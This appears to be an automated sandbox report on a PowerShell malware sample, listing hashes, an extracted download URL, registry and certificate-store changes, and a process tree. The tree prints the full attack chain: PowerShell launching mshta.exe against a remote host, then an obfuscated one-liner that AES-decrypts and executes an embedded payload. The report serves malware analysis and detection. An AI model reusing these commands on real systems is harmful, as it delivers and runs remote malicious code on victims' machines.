Analysis
-
max time kernel
45s -
max time network
62s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
05-05-2024 18:02
Static task
static1
Behavioral task
behavioral1
Sample
target.ps1
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
target.ps1
Resource
win10v2004-20240226-en
General
-
Target
target.ps1
-
Size
154B
-
MD5
e92339c8a8820df2920d180ffcc66d45
-
SHA1
23968fbc5ae4fdf48fd699dcfee8c417317b0444
-
SHA256
15c486428ca6ef7add4c57355497f270f2a38ed43c40b994933d67d5f7e664fc
-
SHA512
dba5d0942a75a139fb5c5d67f8421fa0bb3c6f351554677117c46a9136cd12d4940ca80ef94796dfc578dbe81000c08d02ac19709453b26ac810e0d1b6db7abe
Malware Config
Extracted
https://fatodex.b-cdn.net/fatodex
Signatures
-
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exepowershell.exeflow pid Process 4 2708 mshta.exe 7 2708 mshta.exe 9 2708 mshta.exe 11 2708 mshta.exe 13 2708 mshta.exe 15 1716 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
mshta.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Processes:
mshta.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid Process 1540 powershell.exe 2480 powershell.exe 1716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 1716 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
mshta.exepid Process 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe 2708 mshta.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
mshta.exepid Process 2708 mshta.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
powershell.exepowershell.exemshta.exedescription pid Process procid_target PID 1540 wrote to memory of 2480 1540 powershell.exe 29 PID 1540 wrote to memory of 2480 1540 powershell.exe 29 PID 1540 wrote to memory of 2480 1540 powershell.exe 29 PID 2480 wrote to memory of 2708 2480 powershell.exe 30 PID 2480 wrote to memory of 2708 2480 powershell.exe 30 PID 2480 wrote to memory of 2708 2480 powershell.exe 30 PID 2708 wrote to memory of 1716 2708 mshta.exe 31 PID 2708 wrote to memory of 1716 2708 mshta.exe 31 PID 2708 wrote to memory of 1716 2708 mshta.exe 31
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\target.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . mshta.exe https://fatodex.b-cdn.net/fatodex2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function DREeX($LWLOOBaM){return -split ($LWLOOBaM -replace '..', '0x$& ')};$zJmEepa = DREeX('FB7B0A5BDDA8D362B80F07A7D5531D62B890251A285AA2B74CC1546CE957F65F77729D219F4EADB2C7AB5DA5C639642B264AC843F39FEAC517124A3BD072157E8B0F5DDBAD3A23698D69AB8244E7FDADC3F0B728435A74338C3B2BE898C36E1ADDE3B7780A2581385C9EEF7A7023553CB81BB1D64D489F562A0D200979C2F862D1ED963CA439C0DA86325411C79282C993B218CC6AC4D7C5B954225AF8207E74F3D8B246D464DDD4056A464200169365A1BA93AD1D4F260F5CDC38F2F258DCA1CFA0FBACD4CAA6F170CD9D5A8F4936B0580C5F72019A310EE8DAB39636BE7497FFBB2FA76336995A7498BC08EF0786E8D4EB4E2C2C8472B7D5E11B98E9F1D2F2B183F47F74C55D2953DEFA3608201A996280A40D4EA4032E3669283D502A6E7252566A2D300105C002F81CC2866CE4152A31C581425E2B339F5F6F277699B4B8640F274142A93C1133B07BCB2E1F36DCD4C18B1197339F5525C053848BE907825F35C4E0C5A192603F5BA473C6A6A62CD50BB1E8C8685B81DFA3B8047E04A954F181E7A82DA5844DB8F49BDF9F3D99665AD21B7925C0CDA1D44A1699FB707A3E1601843F6D7352308FCA948DB1A6AF19EB190A40B042C5CF55609615A59DA120448E63BB063176F5EB8480DD7ACF5D097CB386C4739480B67CFC8CECE7B1330079CB99A3E93FC9FD1EEC630380EAB351099652CDA6291B5CE11728956207D0A91DF6E6B19A54B8C65823EDD58C01E3B61A530570B4E5636F72E1492A0F83A978263E6D673DA1323F5623309337CFBF6A6BB86B4BF0B447D138CD10B26CC88309482F1FAB27C173DC34E79355F6C96539A109E145C56AD83F3B9B1FC2C296944C28B30F823741192FECC5EB45A6DAA70BF003F5210661CB16A24AB96922AEEDE06FE83B56254652DE87231038E9EEA68B6754C9766B30DBDAD6E7C20EF3786EC16CCBFFABC3FBA56DD3FA266FCD53458AFFE6CA169B09AA60814707DC7F5D62CA7D1E2BE6330DF024EA5A74F5B57D3D3FF3E9190852F20C649E126447D4CFE3772F9D29027C6E1CB98B3D0723502F19AF23EDA46CED4F9B22CCA2F947F0548364D409371682A086BD0FFC9F9699C954B714001024A4138F4BCDE21BF8BDCDEC63500409CA9AA12E7E8F73DE0681FED9B5C40375F0946521ABA6A8F96AA3A0AABDA6DEF8EAFAC4B49CDC0AA4991B63E86772965327311FDCDE98E2F5CEE70A5C5B8BF0DACD25AAE74E8A61F0C7A0622702E07413EAB584C62E1830D4260C33B00255A792BA352A5541EF164FF19F5DA6BFDF3B94290EFD09F5740C700A4E39037637B12C655646F4871D1019860586EEB24B6D1F17342258F188A4F2ECD6FC30737FDC38CCEB5C71C8578E84F7AD87EE859D1F0322C63EDFE9B9B3879F23D30E170B928E0B6644178DB6DE7E8926462CAD8E02DF2561FFE1BA1003E935C3E0F8426B78DD1F22A46B822F120308FEF67306B27298B7F37B82B6858A5BE16C1AF3728B421001B4A9C32FCE1ADE7D21DA1E7B44741C84458F77DA704AE26195B5684E633D1FD8E0C16501F1D74B4927F81C3457044D2338F2B2BACCB8F5314EAD6AE0D81DF18E3DD624B5ED9E07BACC1E1C8A5E3FA1E81C0E284045ED57FF3C5CDB185EE57540E91C0D79689DF28FBB4CE70104BFF39D65F4D91D0555B4E91FF9D14CC1735CC6C0654CD94CC9E129936C0B35EA7E45F869FD27FE21DBC8DB119B48C4F3A2282F751EE41BC616CF285B8DF1CE0367080E9D2CB822579E1E960C0C05CA2464B9D5C40D1279C17F38B10F14B960F347BAE6F8568252DFCE7197A4B9471A0F5FCBE581A11082C99976091BEB2C2ACE9185A223249D95DEA4BFD57CDE2C392E017609CCCC7A1D8CBDF2BAD732E614039F339D60BFD82F34C75D10446028FF33BC5197D05CEA8A943490ED864C6D94');$dOmDq = [System.Security.Cryptography.Aes]::Create();$dOmDq.Key = DREeX('47527379546E7A6A4656756270556B4E');$dOmDq.IV = New-Object byte[] 16;$RuOilBnC = $dOmDq.CreateDecryptor();$gmaSVzrdz = $RuOilBnC.TransformFinalBlock($zJmEepa, 0, $zJmEepa.Length);$HbnJsGINd = [System.Text.Encoding]::Utf8.GetString($gmaSVzrdz);$RuOilBnC.Dispose();& $HbnJsGINd.Substring(0,3) $HbnJsGINd.Substring(3)4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DI0BP7CV272XFKRJMNC0.temp
Filesize7KB
MD5c1fecd7221a3d13770c3f9711b3425a4
SHA187e70f007d87af193b047fca1f8997d747f833de
SHA25624b1c673dc587581fad28ffb1efbe99e5ea4aa3795a03d9051c1fdb0fbfbf440
SHA51221df76d1d0a61073b2551ef639bdb2ebd36c4c7e15c27188c1176ac5c38ff9b81d65c648e9b4a2a640ca4b72887189b29677ba78c9392950d3efe9374f6ac89c